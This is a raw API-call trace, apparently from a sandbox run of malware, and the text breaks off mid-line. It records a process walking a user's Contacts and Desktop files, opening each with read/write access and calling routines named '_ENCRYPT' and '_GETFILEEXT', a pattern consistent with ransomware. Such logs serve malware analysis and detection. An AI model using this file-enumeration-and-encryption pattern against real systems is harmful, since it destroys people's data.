[0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.905] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.907] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0074.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0074.908] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0074.908] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0074.908] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.908] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0074.908] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0074.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.909] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0074.909] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.909] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x657690, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x6b89b8 [0074.909] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.909] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x657690, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x6b89b8 [0074.910] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.910] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.910] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.910] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.910] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.910] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.910] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.910] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.910] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.911] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0074.942] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.942] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0074.942] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.943] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0074.944] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0074.944] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x657690, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x6b89b8 [0074.952] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x657690, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x6b89b8 [0074.953] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.953] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.953] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.980] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.981] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0074.982] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.982] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0074.982] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.982] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0074.983] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0074.983] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0074.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 0x6b89b8 [0074.983] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 0x6b89b8 [0074.983] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.983] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.983] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.983] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.984] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.019] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.019] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.019] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.019] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.020] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.020] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x657690, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x6b89b8 [0075.020] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x657690, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x6b89b8 [0075.020] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.020] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.020] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.020] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.021] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.026] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.026] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.026] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.026] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.027] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.027] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x657690, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x6b89b8 [0075.028] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x657690, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x6b89b8 [0075.028] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.028] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.028] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.028] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.029] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.029] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.029] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.029] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.029] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.030] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.030] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd5e4b850, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x0, dwReserved1=0x657690, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0x6b89b8 [0075.030] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG 